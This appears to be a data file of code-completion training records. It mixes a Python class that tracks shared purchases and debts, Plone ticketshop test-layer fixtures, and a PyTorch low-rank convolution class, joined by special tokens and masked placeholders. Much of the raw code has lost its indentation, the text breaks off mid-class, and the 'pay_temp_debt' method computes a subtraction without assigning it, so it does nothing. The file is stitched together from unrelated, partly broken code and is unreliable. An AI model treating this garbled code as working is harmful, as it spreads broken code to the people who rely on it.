self.debt_temp = self.debt_temp + payment * -1
def pay_temp_debt(self, payment):
self.debt_temp - payment
def round_payments(self):
for x in range(0, len(self.pay)):
self.pay[x] = round(self.pay[x], 2)
def round_purchases(self):
for x in range(0, len(self.purchases)):
self.purchases[x] = round(float(self.purchases[x]), 2)
<|reserved_special_token_1|>
class people:
def __init__(self, name):
self.name = name
self.purchase_descrip = []
self.purchase_price_descrip = []
self.purchases = []
self.total_spent = 0
self.debt = 0
self.debt_temp = 0
self.pay = []
self.pay_out = []
self.pay_who = []
def add_purchase(self, purchase):
self.purchases.append(purchase)
def add_description(self, description):
self.purchase_descrip.append(description)
def get_purchase(self):
return self.purchases
<|reserved_special_token_0|>
def set_total(self):
self.total_spent = 0
for items in self.purchases:
self.total_spent = self.total_spent + float(items)
def get_total(self):
return self.total_spent
def get_name(self):
return self.name
def add_purchase_descrip(self, price, description):
self.purchase_price_descrip.append('$' + str(price) + ' ' +
description)
def get_purchase_descrip(self):
return self.purchase_price_descrip
def set_debt(self, cost_per_person):
self.debt = float(self.total_spent) - cost_per_person
def get_debt(self):
return self.debt
def add_payment(self, payment):
self.pay.append(payment)
def get_pay(self):
return self.pay
def add_pay_who(self, who_to_pay):
self.pay_who.append(who_to_pay)
def get_pay_who(self):
return self.pay_who
def set_debt_temp(self):
self.debt_temp = self.debt
def get_temp_debt(self):
return self.debt_temp
def update_temp_debt(self, payment):
self.debt_temp = self.debt_temp + payment * -1
def pay_temp_debt(self, payment):
self.debt_temp - payment
def round_payments(self):
for x in range(0, len(self.pay)):
self.pay[x] = round(self.pay[x], 2)
def round_purchases(self):
for x in range(0, len(self.purchases)):
self.purchases[x] = round(float(self.purchases[x]), 2)
<|reserved_special_token_1|>
class people:
def __init__(self, name):
self.name = name
self.purchase_descrip = []
self.purchase_price_descrip = []
self.purchases = []
self.total_spent = 0
self.debt = 0
self.debt_temp = 0
self.pay = []
self.pay_out = []
self.pay_who = []
def add_purchase(self, purchase):
self.purchases.append(purchase)
def add_description(self, description):
self.purchase_descrip.append(description)
def get_purchase(self):
return self.purchases
def get_description(self):
return self.purchase_descrip
def set_total(self):
self.total_spent = 0
for items in self.purchases:
self.total_spent = self.total_spent+float(items)
def get_total(self):
return self.total_spent
def get_name(self):
return self.name
def add_purchase_descrip(self, price, description):
self.purchase_price_descrip.append("$"+str(price)+" "+description)
def get_purchase_descrip(self):
return self.purchase_price_descrip
def set_debt(self, cost_per_person):
self.debt = float(self.total_spent)-cost_per_person
def get_debt(self):
return self.debt
def add_payment(self, payment):
self.pay.append(payment)
def get_pay(self):
return self.pay
def add_pay_who(self, who_to_pay):
self.pay_who.append(who_to_pay)
def get_pay_who(self):
return self.pay_who
def set_debt_temp(self):
self.debt_temp = self.debt
def get_temp_debt(self):
return self.debt_temp
def update_temp_debt(self, payment):
self.debt_temp = self.debt_temp+payment*-1
def pay_temp_debt(self, payment):
self.debt_temp-payment
def round_payments(self):
for x in range(0, len(self.pay)):
self.pay[x] = round(self.pay[x], 2)
def round_purchases(self):
for x in range(0, len(self.purchases)):
self.purchases[x] = round(float(self.purchases[x]), 2)
|
flexible
|
{
"blob_id": "bdda42665acfefccad45a2b49f5436a186140579",
"index": 8576,
"step-1": "class people:\n <mask token>\n\n def add_purchase(self, purchase):\n self.purchases.append(purchase)\n\n def add_description(self, description):\n self.purchase_descrip.append(description)\n <mask token>\n <mask token>\n\n def set_total(self):\n self.total_spent = 0\n for items in self.purchases:\n self.total_spent = self.total_spent + float(items)\n <mask token>\n <mask token>\n\n def add_purchase_descrip(self, price, description):\n self.purchase_price_descrip.append('$' + str(price) + ' ' +\n description)\n\n def get_purchase_descrip(self):\n return self.purchase_price_descrip\n\n def set_debt(self, cost_per_person):\n self.debt = float(self.total_spent) - cost_per_person\n\n def get_debt(self):\n return self.debt\n <mask token>\n <mask token>\n <mask token>\n\n def get_pay_who(self):\n return self.pay_who\n\n def set_debt_temp(self):\n self.debt_temp = self.debt\n\n def get_temp_debt(self):\n return self.debt_temp\n <mask token>\n\n def pay_temp_debt(self, payment):\n self.debt_temp - payment\n\n def round_payments(self):\n for x in range(0, len(self.pay)):\n self.pay[x] = round(self.pay[x], 2)\n <mask token>\n",
"step-2": "class people:\n <mask token>\n\n def add_purchase(self, purchase):\n self.purchases.append(purchase)\n\n def add_description(self, description):\n self.purchase_descrip.append(description)\n\n def get_purchase(self):\n return self.purchases\n <mask token>\n\n def set_total(self):\n self.total_spent = 0\n for items in self.purchases:\n self.total_spent = self.total_spent + float(items)\n\n def get_total(self):\n return self.total_spent\n <mask token>\n\n def add_purchase_descrip(self, price, description):\n self.purchase_price_descrip.append('$' + str(price) + ' ' +\n description)\n\n def get_purchase_descrip(self):\n return self.purchase_price_descrip\n\n def set_debt(self, cost_per_person):\n self.debt = float(self.total_spent) - cost_per_person\n\n def get_debt(self):\n return self.debt\n\n def add_payment(self, payment):\n self.pay.append(payment)\n <mask token>\n\n def add_pay_who(self, who_to_pay):\n self.pay_who.append(who_to_pay)\n\n def get_pay_who(self):\n return self.pay_who\n\n def set_debt_temp(self):\n self.debt_temp = self.debt\n\n def get_temp_debt(self):\n return self.debt_temp\n\n def update_temp_debt(self, payment):\n self.debt_temp = self.debt_temp + payment * -1\n\n def pay_temp_debt(self, payment):\n self.debt_temp - payment\n\n def round_payments(self):\n for x in range(0, len(self.pay)):\n self.pay[x] = round(self.pay[x], 2)\n <mask token>\n",
"step-3": "class people:\n\n def __init__(self, name):\n self.name = name\n self.purchase_descrip = []\n self.purchase_price_descrip = []\n self.purchases = []\n self.total_spent = 0\n self.debt = 0\n self.debt_temp = 0\n self.pay = []\n self.pay_out = []\n self.pay_who = []\n\n def add_purchase(self, purchase):\n self.purchases.append(purchase)\n\n def add_description(self, description):\n self.purchase_descrip.append(description)\n\n def get_purchase(self):\n return self.purchases\n <mask token>\n\n def set_total(self):\n self.total_spent = 0\n for items in self.purchases:\n self.total_spent = self.total_spent + float(items)\n\n def get_total(self):\n return self.total_spent\n <mask token>\n\n def add_purchase_descrip(self, price, description):\n self.purchase_price_descrip.append('$' + str(price) + ' ' +\n description)\n\n def get_purchase_descrip(self):\n return self.purchase_price_descrip\n\n def set_debt(self, cost_per_person):\n self.debt = float(self.total_spent) - cost_per_person\n\n def get_debt(self):\n return self.debt\n\n def add_payment(self, payment):\n self.pay.append(payment)\n <mask token>\n\n def add_pay_who(self, who_to_pay):\n self.pay_who.append(who_to_pay)\n\n def get_pay_who(self):\n return self.pay_who\n\n def set_debt_temp(self):\n self.debt_temp = self.debt\n\n def get_temp_debt(self):\n return self.debt_temp\n\n def update_temp_debt(self, payment):\n self.debt_temp = self.debt_temp + payment * -1\n\n def pay_temp_debt(self, payment):\n self.debt_temp - payment\n\n def round_payments(self):\n for x in range(0, len(self.pay)):\n self.pay[x] = round(self.pay[x], 2)\n\n def round_purchases(self):\n for x in range(0, len(self.purchases)):\n self.purchases[x] = round(float(self.purchases[x]), 2)\n",
"step-4": "class people:\n\n def __init__(self, name):\n self.name = name\n self.purchase_descrip = []\n self.purchase_price_descrip = []\n self.purchases = []\n self.total_spent = 0\n self.debt = 0\n self.debt_temp = 0\n self.pay = []\n self.pay_out = []\n self.pay_who = []\n\n def add_purchase(self, purchase):\n self.purchases.append(purchase)\n\n def add_description(self, description):\n self.purchase_descrip.append(description)\n\n def get_purchase(self):\n return self.purchases\n <mask token>\n\n def set_total(self):\n self.total_spent = 0\n for items in self.purchases:\n self.total_spent = self.total_spent + float(items)\n\n def get_total(self):\n return self.total_spent\n\n def get_name(self):\n return self.name\n\n def add_purchase_descrip(self, price, description):\n self.purchase_price_descrip.append('$' + str(price) + ' ' +\n description)\n\n def get_purchase_descrip(self):\n return self.purchase_price_descrip\n\n def set_debt(self, cost_per_person):\n self.debt = float(self.total_spent) - cost_per_person\n\n def get_debt(self):\n return self.debt\n\n def add_payment(self, payment):\n self.pay.append(payment)\n\n def get_pay(self):\n return self.pay\n\n def add_pay_who(self, who_to_pay):\n self.pay_who.append(who_to_pay)\n\n def get_pay_who(self):\n return self.pay_who\n\n def set_debt_temp(self):\n self.debt_temp = self.debt\n\n def get_temp_debt(self):\n return self.debt_temp\n\n def update_temp_debt(self, payment):\n self.debt_temp = self.debt_temp + payment * -1\n\n def pay_temp_debt(self, payment):\n self.debt_temp - payment\n\n def round_payments(self):\n for x in range(0, len(self.pay)):\n self.pay[x] = round(self.pay[x], 2)\n\n def round_purchases(self):\n for x in range(0, len(self.purchases)):\n self.purchases[x] = round(float(self.purchases[x]), 2)\n",
"step-5": "class people:\n\n def __init__(self, name):\n self.name = name\n self.purchase_descrip = []\n self.purchase_price_descrip = []\n self.purchases = []\n self.total_spent = 0\n self.debt = 0\n self.debt_temp = 0\n self.pay = []\n self.pay_out = []\n self.pay_who = []\n\n def add_purchase(self, purchase):\n self.purchases.append(purchase)\n\n def add_description(self, description):\n self.purchase_descrip.append(description)\n\n def get_purchase(self):\n return self.purchases\n\n def get_description(self):\n return self.purchase_descrip\n\n def set_total(self):\n self.total_spent = 0\n for items in self.purchases:\n self.total_spent = self.total_spent+float(items)\n\n def get_total(self):\n return self.total_spent\n\n def get_name(self):\n return self.name\n\n def add_purchase_descrip(self, price, description):\n self.purchase_price_descrip.append(\"$\"+str(price)+\" \"+description)\n\n def get_purchase_descrip(self):\n return self.purchase_price_descrip\n\n def set_debt(self, cost_per_person):\n self.debt = float(self.total_spent)-cost_per_person\n\n def get_debt(self):\n return self.debt\n\n def add_payment(self, payment):\n self.pay.append(payment)\n\n def get_pay(self):\n return self.pay\n\n def add_pay_who(self, who_to_pay):\n self.pay_who.append(who_to_pay)\n\n def get_pay_who(self):\n return self.pay_who\n\n def set_debt_temp(self):\n self.debt_temp = self.debt\n\n def get_temp_debt(self):\n return self.debt_temp\n\n def update_temp_debt(self, payment):\n self.debt_temp = self.debt_temp+payment*-1\n\n def pay_temp_debt(self, payment):\n self.debt_temp-payment\n\n def round_payments(self):\n for x in range(0, len(self.pay)):\n self.pay[x] = round(self.pay[x], 2)\n\n def round_purchases(self):\n for x in range(0, len(self.purchases)):\n self.purchases[x] = round(float(self.purchases[x]), 2)\n\n\n\n",
"step-ids": [
13,
18,
20,
22,
24
]
}
|
[
13,
18,
20,
22,
24
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if __name__ == '__main__':
run()
<|reserved_special_token_1|>
from ..src.script import run
if __name__ == '__main__':
run()
<|reserved_special_token_1|>
# only place executable files here
#
# from ..src import package
# data_dict = package.pack()
# from ..src.plugins import * # interpreted once, everything is loaded into memory
# from ..src import plugins # imports this folder (package/module/class library); by default its init file is loaded into memory
#
#
# plugins.pack()
from ..src.script import run
if __name__ == '__main__':
run()
|
flexible
|
{
"blob_id": "4f870e0d86d9f9b8c620115a618ea32abc24c52d",
"index": 3008,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n run()\n",
"step-3": "from ..src.script import run\nif __name__ == '__main__':\n run()\n",
"step-4": "# 只放置可执行文件\n#\n# from ..src import package\n# data_dict = package.pack()\n\n# from ..src.plugins import * #解释一遍全放入内存\n# from ..src import plugins #导入这个文件夹(包,模块,类库),默认加载init文件到内存\n#\n#\n# plugins.pack()\n\n\nfrom ..src.script import run\n\nif __name__ == '__main__':\n run()\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from Products.CMFPlone.utils import getFSVersionTuple
from bda.plone.ticketshop.interfaces import ITicketShopExtensionLayer
from plone.app.robotframework.testing import MOCK_MAILHOST_FIXTURE
from plone.app.testing import FunctionalTesting
from plone.app.testing import IntegrationTesting
from plone.app.testing import PLONE_FIXTURE
from plone.app.testing import PloneSandboxLayer
from plone.app.testing import TEST_USER_ID
from plone.app.testing import setRoles
from plone.testing import z2
from zope.interface import alsoProvides
import plone.api
if getFSVersionTuple()[0] >= 5:
PLONE5 = 1
else:
PLONE5 = 0
def set_browserlayer(request):
"""Set the BrowserLayer for the request.
We have to set the browserlayer manually, since importing the profile alone
doesn't do it in tests.
"""
alsoProvides(request, ITicketShopExtensionLayer)
class TicketshopLayer(PloneSandboxLayer):
defaultBases = (PLONE_FIXTURE,)
def setUpZope(self, app, configurationContext):
import bda.plone.ticketshop
self.loadZCML(package=bda.plone.ticketshop,
context=configurationContext)
# Install products that use an old-style initialize() function
z2.installProduct(app, 'Products.DateRecurringIndex')
def setUpPloneSite(self, portal):
self.applyProfile(portal, 'bda.plone.ticketshop:default')
def tearDownZope(self, app):
# Uninstall old-style Products
z2.uninstallProduct(app, 'Products.DateRecurringIndex')
Ticketshop_FIXTURE = TicketshopLayer()
Ticketshop_INTEGRATION_TESTING = IntegrationTesting(
bases=(Ticketshop_FIXTURE,),
name="Ticketshop:Integration")
class TicketshopATLayer(PloneSandboxLayer):
# don't use shop fixture here. looks like, test layers use differen ZODB
# connections and c.z.datagriedfield fails with a ZODB object reference
# error.
defaultBases = (PLONE_FIXTURE,)
def setUpZope(self, app, configurationContext):
import Products.ATContentTypes
self.loadZCML(package=Products.ATContentTypes,
context=configurationContext)
import bda.plone.ticketshop
self.loadZCML(package=bda.plone.ticketshop,
context=configurationContext)
# Install products that use an old-style initialize() function
z2.installProduct(app, 'Products.DateRecurringIndex')
z2.installProduct(app, 'bda.plone.ticketshop.at')
def setUpPloneSite(self, portal):
if PLONE5:
self.applyProfile(portal, 'Products.ATContentTypes:default')
self.applyProfile(portal, 'bda.plone.ticketshop.at:default')
portal.portal_workflow.setDefaultChain("one_state_workflow")
setRoles(portal, TEST_USER_ID, ['Manager'])
# Create test users
cru = plone.api.user.create
cru(email="[email protected]", username="customer1", password="customer1")
cru(email="[email protected]", username="customer2", password="customer2")
cru(email="[email protected]", username="vendor1", password="vendor1")
cru(email="[email protected]", username="vendor2", password="vendor2")
# Create test content
crc = plone.api.content.create
crc(container=portal, type='Buyable Event', id='folder_1')
crc(container=portal['folder_1'], type='Ticket', id='item_11',
title="item_11")
crc(container=portal['folder_1'], type='Ticket', id='item_12',
title="item_12")
crc(container=portal, type='Buyable Event', id='folder_2')
crc(container=portal['folder_2'], type='Ticket', id='item_21',
title="item_21")
crc(container=portal['folder_2'], type='Ticket', id='item_22',
title="item_22")
TicketshopAT_FIXTURE = TicketshopATLayer()
TicketshopAT_INTEGRATION_TESTING = IntegrationTesting(
bases=(TicketshopAT_FIXTURE,),
name="TicketshopAT:Integration")
TicketshopAT_ROBOT_TESTING = FunctionalTesting(
bases=(
MOCK_MAILHOST_FIXTURE,
TicketshopAT_FIXTURE,
z2.ZSERVER_FIXTURE
),
name="TicketshopAT:Robot")
|
normal
|
{
"blob_id": "5d7080f2778133d1938853512ca038edcf7c0dc4",
"index": 1002,
"step-1": "<mask token>\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes, context=\n configurationContext)\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n portal.portal_workflow.setDefaultChain('one_state_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n cru = plone.api.user.create\n cru(email='[email protected]', username='customer1', password='customer1')\n cru(email='[email protected]', username='customer2', password='customer2')\n cru(email='[email protected]', username='vendor1', password='vendor1')\n cru(email='[email protected]', username='vendor2', password='vendor2')\n crc = plone.api.content.create\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title='item_11')\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title='item_12')\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title='item_21')\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title='item_22')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TicketshopLayer(PloneSandboxLayer):\n <mask token>\n <mask token>\n\n def setUpPloneSite(self, portal):\n self.applyProfile(portal, 'bda.plone.ticketshop:default')\n\n def tearDownZope(self, app):\n z2.uninstallProduct(app, 'Products.DateRecurringIndex')\n\n\n<mask token>\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes, context=\n configurationContext)\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n portal.portal_workflow.setDefaultChain('one_state_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n cru = plone.api.user.create\n cru(email='[email protected]', username='customer1', password='customer1')\n cru(email='[email protected]', username='customer2', password='customer2')\n cru(email='[email protected]', username='vendor1', password='vendor1')\n cru(email='[email protected]', username='vendor2', password='vendor2')\n crc = plone.api.content.create\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title='item_11')\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title='item_12')\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title='item_21')\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title='item_22')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef set_browserlayer(request):\n \"\"\"Set the BrowserLayer for the request.\n\n We have to set the browserlayer manually, since importing the profile alone\n doesn't do it in tests.\n \"\"\"\n alsoProvides(request, ITicketShopExtensionLayer)\n\n\nclass TicketshopLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n\n def setUpPloneSite(self, portal):\n self.applyProfile(portal, 'bda.plone.ticketshop:default')\n\n def tearDownZope(self, app):\n z2.uninstallProduct(app, 'Products.DateRecurringIndex')\n\n\n<mask token>\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes, context=\n configurationContext)\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n portal.portal_workflow.setDefaultChain('one_state_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n cru = plone.api.user.create\n cru(email='[email protected]', username='customer1', password='customer1')\n cru(email='[email protected]', username='customer2', password='customer2')\n cru(email='[email protected]', username='vendor1', password='vendor1')\n cru(email='[email protected]', username='vendor2', password='vendor2')\n crc = plone.api.content.create\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title='item_11')\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title='item_12')\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title='item_21')\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title='item_22')\n\n\n<mask token>\n",
"step-4": "<mask token>\nif getFSVersionTuple()[0] >= 5:\n PLONE5 = 1\nelse:\n PLONE5 = 0\n\n\ndef set_browserlayer(request):\n \"\"\"Set the BrowserLayer for the request.\n\n We have to set the browserlayer manually, since importing the profile alone\n doesn't do it in tests.\n \"\"\"\n alsoProvides(request, ITicketShopExtensionLayer)\n\n\nclass TicketshopLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n\n def setUpPloneSite(self, portal):\n self.applyProfile(portal, 'bda.plone.ticketshop:default')\n\n def tearDownZope(self, app):\n z2.uninstallProduct(app, 'Products.DateRecurringIndex')\n\n\n<mask token>\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes, context=\n configurationContext)\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n portal.portal_workflow.setDefaultChain('one_state_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n cru = plone.api.user.create\n cru(email='[email protected]', username='customer1', password='customer1')\n cru(email='[email protected]', username='customer2', password='customer2')\n cru(email='[email protected]', username='vendor1', password='vendor1')\n cru(email='[email protected]', username='vendor2', password='vendor2')\n crc = plone.api.content.create\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title='item_11')\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title='item_12')\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title='item_21')\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title='item_22')\n\n\n<mask token>\n",
"step-5": "from Products.CMFPlone.utils import getFSVersionTuple\nfrom bda.plone.ticketshop.interfaces import ITicketShopExtensionLayer\nfrom plone.app.robotframework.testing import MOCK_MAILHOST_FIXTURE\nfrom plone.app.testing import FunctionalTesting\nfrom plone.app.testing import IntegrationTesting\nfrom plone.app.testing import PLONE_FIXTURE\nfrom plone.app.testing import PloneSandboxLayer\nfrom plone.app.testing import TEST_USER_ID\nfrom plone.app.testing import setRoles\nfrom plone.testing import z2\nfrom zope.interface import alsoProvides\nimport plone.api\n\nif getFSVersionTuple()[0] >= 5:\n PLONE5 = 1\nelse:\n PLONE5 = 0\n\n\ndef set_browserlayer(request):\n \"\"\"Set the BrowserLayer for the request.\n\n We have to set the browserlayer manually, since importing the profile alone\n doesn't do it in tests.\n \"\"\"\n alsoProvides(request, ITicketShopExtensionLayer)\n\n\nclass TicketshopLayer(PloneSandboxLayer):\n defaultBases = (PLONE_FIXTURE,)\n\n def setUpZope(self, app, configurationContext):\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop,\n context=configurationContext)\n\n # Install products that use an old-style initialize() function\n z2.installProduct(app, 'Products.DateRecurringIndex')\n\n def setUpPloneSite(self, portal):\n self.applyProfile(portal, 'bda.plone.ticketshop:default')\n\n def tearDownZope(self, app):\n # Uninstall old-style Products\n z2.uninstallProduct(app, 'Products.DateRecurringIndex')\n\n\nTicketshop_FIXTURE = TicketshopLayer()\nTicketshop_INTEGRATION_TESTING = IntegrationTesting(\n bases=(Ticketshop_FIXTURE,),\n name=\"Ticketshop:Integration\")\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n # don't use shop fixture here. looks like, test layers use differen ZODB\n # connections and c.z.datagriedfield fails with a ZODB object reference\n # error.\n defaultBases = (PLONE_FIXTURE,)\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes,\n context=configurationContext)\n\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop,\n context=configurationContext)\n\n # Install products that use an old-style initialize() function\n z2.installProduct(app, 'Products.DateRecurringIndex')\n\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n\n portal.portal_workflow.setDefaultChain(\"one_state_workflow\")\n setRoles(portal, TEST_USER_ID, ['Manager'])\n\n # Create test users\n cru = plone.api.user.create\n cru(email=\"[email protected]\", username=\"customer1\", password=\"customer1\")\n cru(email=\"[email protected]\", username=\"customer2\", password=\"customer2\")\n cru(email=\"[email protected]\", username=\"vendor1\", password=\"vendor1\")\n cru(email=\"[email protected]\", username=\"vendor2\", password=\"vendor2\")\n\n # Create test content\n crc = plone.api.content.create\n\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title=\"item_11\")\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title=\"item_12\")\n\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title=\"item_21\")\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title=\"item_22\")\n\n\nTicketshopAT_FIXTURE 
= TicketshopATLayer()\nTicketshopAT_INTEGRATION_TESTING = IntegrationTesting(\n bases=(TicketshopAT_FIXTURE,),\n name=\"TicketshopAT:Integration\")\nTicketshopAT_ROBOT_TESTING = FunctionalTesting(\n bases=(\n MOCK_MAILHOST_FIXTURE,\n TicketshopAT_FIXTURE,\n z2.ZSERVER_FIXTURE\n ),\n name=\"TicketshopAT:Robot\")\n",
"step-ids": [
4,
7,
10,
11,
14
]
}
|
[
4,
7,
10,
11,
14
] |
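A short usage sketch may make the Plone test fixtures in the record above more concrete: a test case points its layer attribute at the integration layer and pulls the portal and request out of the layer resources. The test class name and the assertion below are illustrative only and are not part of the original blob.

# Illustrative test case wired to the integration layer defined in the blob above.
import unittest

class TestTicketshopLayer(unittest.TestCase):
    layer = Ticketshop_INTEGRATION_TESTING  # fixture from the blob above

    def setUp(self):
        self.portal = self.layer['portal']
        self.request = self.layer['request']
        set_browserlayer(self.request)  # helper from the blob above

    def test_browserlayer_applied(self):
        # Sanity check: the ticketshop browser layer is now provided on the request.
        from bda.plone.ticketshop.interfaces import ITicketShopExtensionLayer
        self.assertTrue(ITicketShopExtensionLayer.providedBy(self.request))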
<|reserved_special_token_0|>
class xCNNlow(torch.nn.Module):
def __init__(self, channels, filters, kernel_size, padding=0, stride=1,
groups=1, rank=1, bias=True):
super(xCNNlow, self).__init__()
self.filters = filters
self.times = 2
self.kernel_size = kernel_size
self.channels = channels // groups
self.padding = padding
self.stride = stride
self.biasTrue = bias
self.rank = rank
self.groups = groups
self.conv_weights = nn.Parameter(torch.Tensor(filters // self.times,
channels, kernel_size, kernel_size).to(device))
self.column_weights = nn.Parameter(torch.Tensor(filters - filters //
self.times, self.rank).to(device))
self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters //
self.times).to(device))
torch.nn.init.xavier_uniform(self.conv_weights)
self.column_weights.data.uniform_(-0.1, 0.1)
self.row_weights.data.uniform_(-0.1, 0.1)
if self.biasTrue:
self.bias = nn.Parameter(torch.Tensor(filters).to(device))
self.bias.data.uniform_(-0.1, 0.1)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class xCNNlow(torch.nn.Module):
def __init__(self, channels, filters, kernel_size, padding=0, stride=1,
groups=1, rank=1, bias=True):
super(xCNNlow, self).__init__()
self.filters = filters
self.times = 2
self.kernel_size = kernel_size
self.channels = channels // groups
self.padding = padding
self.stride = stride
self.biasTrue = bias
self.rank = rank
self.groups = groups
self.conv_weights = nn.Parameter(torch.Tensor(filters // self.times,
channels, kernel_size, kernel_size).to(device))
self.column_weights = nn.Parameter(torch.Tensor(filters - filters //
self.times, self.rank).to(device))
self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters //
self.times).to(device))
torch.nn.init.xavier_uniform(self.conv_weights)
self.column_weights.data.uniform_(-0.1, 0.1)
self.row_weights.data.uniform_(-0.1, 0.1)
if self.biasTrue:
self.bias = nn.Parameter(torch.Tensor(filters).to(device))
self.bias.data.uniform_(-0.1, 0.1)
def forward(self, input):
self.correlated_weights = torch.mm(self.column_weights, torch.mm(
self.row_weights, self.conv_weights.reshape(self.filters //
self.times, -1))).reshape(self.filters - self.filters // self.
times, self.channels, self.kernel_size, self.kernel_size)
if self.biasTrue:
return F.conv2d(input, torch.cat((self.conv_weights, self.
correlated_weights), dim=0), bias=self.bias, padding=self.
padding, stride=self.stride)
else:
return F.conv2d(input, torch.cat((self.conv_weights, self.
correlated_weights), dim=0), padding=self.padding, stride=
self.stride)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class xCNNlow(torch.nn.Module):
def __init__(self, channels, filters, kernel_size, padding=0, stride=1,
groups=1, rank=1, bias=True):
super(xCNNlow, self).__init__()
self.filters = filters
self.times = 2
self.kernel_size = kernel_size
self.channels = channels // groups
self.padding = padding
self.stride = stride
self.biasTrue = bias
self.rank = rank
self.groups = groups
self.conv_weights = nn.Parameter(torch.Tensor(filters // self.times,
channels, kernel_size, kernel_size).to(device))
self.column_weights = nn.Parameter(torch.Tensor(filters - filters //
self.times, self.rank).to(device))
